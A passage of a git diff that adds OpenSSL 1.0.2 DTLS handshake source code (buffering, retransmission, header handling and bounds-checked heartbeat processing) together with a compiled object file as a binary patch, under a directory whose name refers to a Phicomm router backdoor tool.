+{
+    pqueue sent = s->d1->sent_messages;
+    piterator iter;
+    pitem *item;
+    hm_fragment *frag;
+    int found = 0;
+
+    iter = pqueue_iterator(sent);
+
+    for (item = pqueue_next(&iter); item != NULL; item = pqueue_next(&iter)) {
+        frag = (hm_fragment *)item->data;
+        if (dtls1_retransmit_message(s, (unsigned short)
+                                     dtls1_get_queue_priority
+                                     (frag->msg_header.seq,
+                                      frag->msg_header.is_ccs), 0,
+                                     &found) <= 0 && found) {
+            fprintf(stderr, "dtls1_retransmit_message() failed\n");
+            return -1;
+        }
+    }
+
+    return 1;
+}
+
+int dtls1_buffer_message(SSL *s, int is_ccs)
+{
+    pitem *item;
+    hm_fragment *frag;
+    unsigned char seq64be[8];
+
+    /*
+     * this function is called immediately after a message has been
+     * serialized
+     */
+    OPENSSL_assert(s->init_off == 0);
+
+    frag = dtls1_hm_fragment_new(s->init_num, 0);
+    if (!frag)
+        return 0;
+
+    memcpy(frag->fragment, s->init_buf->data, s->init_num);
+
+    if (is_ccs) {
+        OPENSSL_assert(s->d1->w_msg_hdr.msg_len +
+                       DTLS1_CCS_HEADER_LENGTH == (unsigned int)s->init_num);
+    } else {
+        OPENSSL_assert(s->d1->w_msg_hdr.msg_len +
+                       DTLS1_HM_HEADER_LENGTH == (unsigned int)s->init_num);
+    }
+
+    frag->msg_header.msg_len = s->d1->w_msg_hdr.msg_len;
+    frag->msg_header.seq = s->d1->w_msg_hdr.seq;
+    frag->msg_header.type = s->d1->w_msg_hdr.type;
+    frag->msg_header.frag_off = 0;
+    frag->msg_header.frag_len = s->d1->w_msg_hdr.msg_len;
+    frag->msg_header.is_ccs = is_ccs;
+
+    /* save current state */
+    frag->msg_header.saved_retransmit_state.enc_write_ctx = s->enc_write_ctx;
+    frag->msg_header.saved_retransmit_state.write_hash = s->write_hash;
+    frag->msg_header.saved_retransmit_state.compress = s->compress;
+    frag->msg_header.saved_retransmit_state.session = s->session;
+    frag->msg_header.saved_retransmit_state.epoch = s->d1->w_epoch;
+
+    memset(seq64be, 0, sizeof(seq64be));
+    seq64be[6] =
+        (unsigned
+         char)(dtls1_get_queue_priority(frag->msg_header.seq,
+                                        frag->msg_header.is_ccs) >> 8);
+    seq64be[7] =
+        (unsigned
+         char)(dtls1_get_queue_priority(frag->msg_header.seq,
+                                        frag->msg_header.is_ccs));
+
+    item = pitem_new(seq64be, frag);
+    if (item == NULL) {
+        dtls1_hm_fragment_free(frag);
+        return 0;
+    }
+#if 0
+    fprintf(stderr, "buffered messge: \ttype = %xx\n", msg_buf->type);
+    fprintf(stderr, "\t\t\t\t\tlen = %d\n", msg_buf->len);
+    fprintf(stderr, "\t\t\t\t\tseq_num = %d\n", msg_buf->seq_num);
+#endif
+
+    pqueue_insert(s->d1->sent_messages, item);
+    return 1;
+}
+
+int
+dtls1_retransmit_message(SSL *s, unsigned short seq, unsigned long frag_off,
+                         int *found)
+{
+    int ret;
+    /* XDTLS: for now assuming that read/writes are blocking */
+    pitem *item;
+    hm_fragment *frag;
+    unsigned long header_length;
+    unsigned char seq64be[8];
+    struct dtls1_retransmit_state saved_state;
+    unsigned char save_write_sequence[8];
+
+    /*-
+      OPENSSL_assert(s->init_num == 0);
+      OPENSSL_assert(s->init_off == 0);
+     */
+
+    /* XDTLS:  the requested message ought to be found, otherwise error */
+    memset(seq64be, 0, sizeof(seq64be));
+    seq64be[6] = (unsigned char)(seq >> 8);
+    seq64be[7] = (unsigned char)seq;
+
+    item = pqueue_find(s->d1->sent_messages, seq64be);
+    if (item == NULL) {
+        fprintf(stderr, "retransmit:  message %d non-existant\n", seq);
+        *found = 0;
+        return 0;
+    }
+
+    *found = 1;
+    frag = (hm_fragment *)item->data;
+
+    if (frag->msg_header.is_ccs)
+        header_length = DTLS1_CCS_HEADER_LENGTH;
+    else
+        header_length = DTLS1_HM_HEADER_LENGTH;
+
+    memcpy(s->init_buf->data, frag->fragment,
+           frag->msg_header.msg_len + header_length);
+    s->init_num = frag->msg_header.msg_len + header_length;
+
+    dtls1_set_message_header_int(s, frag->msg_header.type,
+                                 frag->msg_header.msg_len,
+                                 frag->msg_header.seq, 0,
+                                 frag->msg_header.frag_len);
+
+    /* save current state */
+    saved_state.enc_write_ctx = s->enc_write_ctx;
+    saved_state.write_hash = s->write_hash;
+    saved_state.compress = s->compress;
+    saved_state.session = s->session;
+    saved_state.epoch = s->d1->w_epoch;
+    saved_state.epoch = s->d1->w_epoch;
+
+    s->d1->retransmitting = 1;
+
+    /* restore state in which the message was originally sent */
+    s->enc_write_ctx = frag->msg_header.saved_retransmit_state.enc_write_ctx;
+    s->write_hash = frag->msg_header.saved_retransmit_state.write_hash;
+    s->compress = frag->msg_header.saved_retransmit_state.compress;
+    s->session = frag->msg_header.saved_retransmit_state.session;
+    s->d1->w_epoch = frag->msg_header.saved_retransmit_state.epoch;
+
+    if (frag->msg_header.saved_retransmit_state.epoch ==
+        saved_state.epoch - 1) {
+        memcpy(save_write_sequence, s->s3->write_sequence,
+               sizeof(s->s3->write_sequence));
+        memcpy(s->s3->write_sequence, s->d1->last_write_sequence,
+               sizeof(s->s3->write_sequence));
+    }
+
+    ret = dtls1_do_write(s, frag->msg_header.is_ccs ?
+                         SSL3_RT_CHANGE_CIPHER_SPEC : SSL3_RT_HANDSHAKE);
+
+    /* restore current state */
+    s->enc_write_ctx = saved_state.enc_write_ctx;
+    s->write_hash = saved_state.write_hash;
+    s->compress = saved_state.compress;
+    s->session = saved_state.session;
+    s->d1->w_epoch = saved_state.epoch;
+
+    if (frag->msg_header.saved_retransmit_state.epoch ==
+        saved_state.epoch - 1) {
+        memcpy(s->d1->last_write_sequence, s->s3->write_sequence,
+               sizeof(s->s3->write_sequence));
+        memcpy(s->s3->write_sequence, save_write_sequence,
+               sizeof(s->s3->write_sequence));
+    }
+
+    s->d1->retransmitting = 0;
+
+    (void)BIO_flush(SSL_get_wbio(s));
+    return ret;
+}
+
+/* call this function when the buffered messages are no longer needed */
+void dtls1_clear_record_buffer(SSL *s)
+{
+    pitem *item;
+
+    for (item = pqueue_pop(s->d1->sent_messages);
+         item != NULL; item = pqueue_pop(s->d1->sent_messages)) {
+        dtls1_hm_fragment_free((hm_fragment *)item->data);
+        pitem_free(item);
+    }
+}
+
+unsigned char *dtls1_set_message_header(SSL *s, unsigned char *p,
+                                        unsigned char mt, unsigned long len,
+                                        unsigned long frag_off,
+                                        unsigned long frag_len)
+{
+    /* Don't change sequence numbers while listening */
+    if (frag_off == 0 && !s->d1->listen) {
+        s->d1->handshake_write_seq = s->d1->next_handshake_write_seq;
+        s->d1->next_handshake_write_seq++;
+    }
+
+    dtls1_set_message_header_int(s, mt, len, s->d1->handshake_write_seq,
+                                 frag_off, frag_len);
+
+    return p += DTLS1_HM_HEADER_LENGTH;
+}
+
+/* don't actually do the writing, wait till the MTU has been retrieved */
+static void
+dtls1_set_message_header_int(SSL *s, unsigned char mt,
+                             unsigned long len, unsigned short seq_num,
+                             unsigned long frag_off, unsigned long frag_len)
+{
+    struct hm_header_st *msg_hdr = &s->d1->w_msg_hdr;
+
+    msg_hdr->type = mt;
+    msg_hdr->msg_len = len;
+    msg_hdr->seq = seq_num;
+    msg_hdr->frag_off = frag_off;
+    msg_hdr->frag_len = frag_len;
+}
+
+static void
+dtls1_fix_message_header(SSL *s, unsigned long frag_off,
+                         unsigned long frag_len)
+{
+    struct hm_header_st *msg_hdr = &s->d1->w_msg_hdr;
+
+    msg_hdr->frag_off = frag_off;
+    msg_hdr->frag_len = frag_len;
+}
+
+static unsigned char *dtls1_write_message_header(SSL *s, unsigned char *p)
+{
+    struct hm_header_st *msg_hdr = &s->d1->w_msg_hdr;
+
+    *p++ = msg_hdr->type;
+    l2n3(msg_hdr->msg_len, p);
+
+    s2n(msg_hdr->seq, p);
+    l2n3(msg_hdr->frag_off, p);
+    l2n3(msg_hdr->frag_len, p);
+
+    return p;
+}
+
+unsigned int dtls1_link_min_mtu(void)
+{
+    return (g_probable_mtu[(sizeof(g_probable_mtu) /
+                            sizeof(g_probable_mtu[0])) - 1]);
+}
+
+unsigned int dtls1_min_mtu(SSL *s)
+{
+    return dtls1_link_min_mtu() - BIO_dgram_get_mtu_overhead(SSL_get_wbio(s));
+}
+
+void
+dtls1_get_message_header(unsigned char *data, struct hm_header_st *msg_hdr)
+{
+    memset(msg_hdr, 0x00, sizeof(struct hm_header_st));
+    msg_hdr->type = *(data++);
+    n2l3(data, msg_hdr->msg_len);
+
+    n2s(data, msg_hdr->seq);
+    n2l3(data, msg_hdr->frag_off);
+    n2l3(data, msg_hdr->frag_len);
+}
+
+void dtls1_get_ccs_header(unsigned char *data, struct ccs_header_st *ccs_hdr)
+{
+    memset(ccs_hdr, 0x00, sizeof(struct ccs_header_st));
+
+    ccs_hdr->type = *(data++);
+}
+
+int dtls1_shutdown(SSL *s)
+{
+    int ret;
+#ifndef OPENSSL_NO_SCTP
+    if (BIO_dgram_is_sctp(SSL_get_wbio(s)) &&
+        !(s->shutdown & SSL_SENT_SHUTDOWN)) {
+        ret = BIO_dgram_sctp_wait_for_dry(SSL_get_wbio(s));
+        if (ret < 0)
+            return -1;
+
+        if (ret == 0)
+            BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SAVE_SHUTDOWN, 1,
+                     NULL);
+    }
+#endif
+    ret = ssl3_shutdown(s);
+#ifndef OPENSSL_NO_SCTP
+    BIO_ctrl(SSL_get_wbio(s), BIO_CTRL_DGRAM_SCTP_SAVE_SHUTDOWN, 0, NULL);
+#endif
+    return ret;
+}
+
+#ifndef OPENSSL_NO_HEARTBEATS
+int dtls1_process_heartbeat(SSL *s)
+{
+    unsigned char *p = &s->s3->rrec.data[0], *pl;
+    unsigned short hbtype;
+    unsigned int payload;
+    unsigned int padding = 16;  /* Use minimum padding */
+
+    if (s->msg_callback)
+        s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT,
+                        &s->s3->rrec.data[0], s->s3->rrec.length,
+                        s, s->msg_callback_arg);
+
+    /* Read type and payload length first */
+    if (1 + 2 + 16 > s->s3->rrec.length)
+        return 0;               /* silently discard */
+    if (s->s3->rrec.length > SSL3_RT_MAX_PLAIN_LENGTH)
+        return 0;               /* silently discard per RFC 6520 sec. 4 */
+
+    hbtype = *p++;
+    n2s(p, payload);
+    if (1 + 2 + payload + 16 > s->s3->rrec.length)
+        return 0;               /* silently discard per RFC 6520 sec. 4 */
+    pl = p;
+
+    if (hbtype == TLS1_HB_REQUEST) {
+        unsigned char *buffer, *bp;
+        unsigned int write_length = 1 /* heartbeat type */  +
+            2 /* heartbeat length */  +
+            payload + padding;
+        int r;
+
+        if (write_length > SSL3_RT_MAX_PLAIN_LENGTH)
+            return 0;
+
+        /*
+         * Allocate memory for the response, size is 1 byte message type,
+         * plus 2 bytes payload length, plus payload, plus padding
+         */
+        buffer = OPENSSL_malloc(write_length);
+        bp = buffer;
+
+        /* Enter response type, length and copy payload */
+        *bp++ = TLS1_HB_RESPONSE;
+        s2n(payload, bp);
+        memcpy(bp, pl, payload);
+        bp += payload;
+        /* Random padding */
+        RAND_pseudo_bytes(bp, padding);
+
+        r = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, write_length);
+
+        if (r >= 0 && s->msg_callback)
+            s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
+                            buffer, write_length, s, s->msg_callback_arg);
+
+        OPENSSL_free(buffer);
+
+        if (r < 0)
+            return r;
+    } else if (hbtype == TLS1_HB_RESPONSE) {
+        unsigned int seq;
+
+        /*
+         * We only send sequence numbers (2 bytes unsigned int), and 16
+         * random bytes, so we just try to read the sequence number
+         */
+        n2s(pl, seq);
+
+        if (payload == 18 && seq == s->tlsext_hb_seq) {
+            dtls1_stop_timer(s);
+            s->tlsext_hb_seq++;
+            s->tlsext_hb_pending = 0;
+        }
+    }
+
+    return 0;
+}
+
+int dtls1_heartbeat(SSL *s)
+{
+    unsigned char *buf, *p;
+    int ret;
+    unsigned int payload = 18;  /* Sequence number + random bytes */
+    unsigned int padding = 16;  /* Use minimum padding */
+
+    /* Only send if peer supports and accepts HB requests... */
+    if (!(s->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED) ||
+        s->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+        SSLerr(SSL_F_DTLS1_HEARTBEAT, SSL_R_TLS_HEARTBEAT_PEER_DOESNT_ACCEPT);
+        return -1;
+    }
+
+    /* ...and there is none in flight yet... */
+    if (s->tlsext_hb_pending) {
+        SSLerr(SSL_F_DTLS1_HEARTBEAT, SSL_R_TLS_HEARTBEAT_PENDING);
+        return -1;
+    }
+
+    /* ...and no handshake in progress. */
+    if (SSL_in_init(s) || s->in_handshake) {
+        SSLerr(SSL_F_DTLS1_HEARTBEAT, SSL_R_UNEXPECTED_MESSAGE);
+        return -1;
+    }
+
+    /*
+     * Check if padding is too long, payload and padding must not exceed 2^14
+     * - 3 = 16381 bytes in total.
+     */
+    OPENSSL_assert(payload + padding <= 16381);
+
+    /*-
+     * Create HeartBeat message, we just use a sequence number
+     * as payload to distuingish different messages and add
+     * some random stuff.
+     *  - Message Type, 1 byte
+     *  - Payload Length, 2 bytes (unsigned int)
+     *  - Payload, the sequence number (2 bytes uint)
+     *  - Payload, random bytes (16 bytes uint)
+     *  - Padding
+     */
+    buf = OPENSSL_malloc(1 + 2 + payload + padding);
+    p = buf;
+    /* Message Type */
+    *p++ = TLS1_HB_REQUEST;
+    /* Payload length (18 bytes here) */
+    s2n(payload, p);
+    /* Sequence number */
+    s2n(s->tlsext_hb_seq, p);
+    /* 16 random bytes */
+    RAND_pseudo_bytes(p, 16);
+    p += 16;
+    /* Random padding */
+    RAND_pseudo_bytes(p, padding);
+
+    ret = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding);
+    if (ret >= 0) {
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
+                            buf, 3 + payload + padding,
+                            s, s->msg_callback_arg);
+
+        dtls1_start_timer(s);
+        s->tlsext_hb_pending = 1;
+    }
+
+    OPENSSL_free(buf);
+
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_both.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/d1_both.o
new file mode 100644
index 0000000000000000000000000000000000000000..967b4956cb302a71867103a83f5c55b226b1148e
GIT binary patch
literal 17384
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
